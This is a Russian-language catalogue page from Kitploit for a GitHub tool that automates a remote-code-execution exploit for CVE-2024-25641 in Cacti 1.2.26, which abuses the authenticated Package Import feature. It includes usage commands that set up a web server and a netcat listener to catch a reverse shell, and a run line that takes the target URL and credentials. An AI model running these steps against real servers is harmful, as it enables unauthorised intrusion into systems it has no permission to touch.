Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 — CVE-2024-25641 - Автоматический эксплойт RCE - Cacti 1.2.26 | Kitploit
Инструменты/GitHubGitHub/leo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubleo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 - Автоматический эксплойт RCE - Cacti 1.2.26

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1011 год назадЕщё не проверено

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Полностью автоматизированный эксплойт для CVE-2024-25641. Когда пользователь аутентифицирован, Cacti версии 1.2.26 уязвим к произвольной записи файлов; эта уязвимость эксплуатируется через функцию "Package Import" и позволяет аутентифицированным пользователям, имеющим разрешение "Import Templates", выполнять произвольный PHP-код на веб-сервере (RCE).

Авторство этого PoC: https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Я просто автоматизировал это, чтобы получить первоначальный доступ.)

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот инструмент предназначен только для образовательных и тестовых целей. Автор этого инструмента не несет ответственности за любое неправильное использование или незаконные действия, совершенные с его помощью. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.

Пример использования

root@kitploit:~
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

Вы также можете посмотреть это: CVE-2024-25641 PoC

Скачать инструмент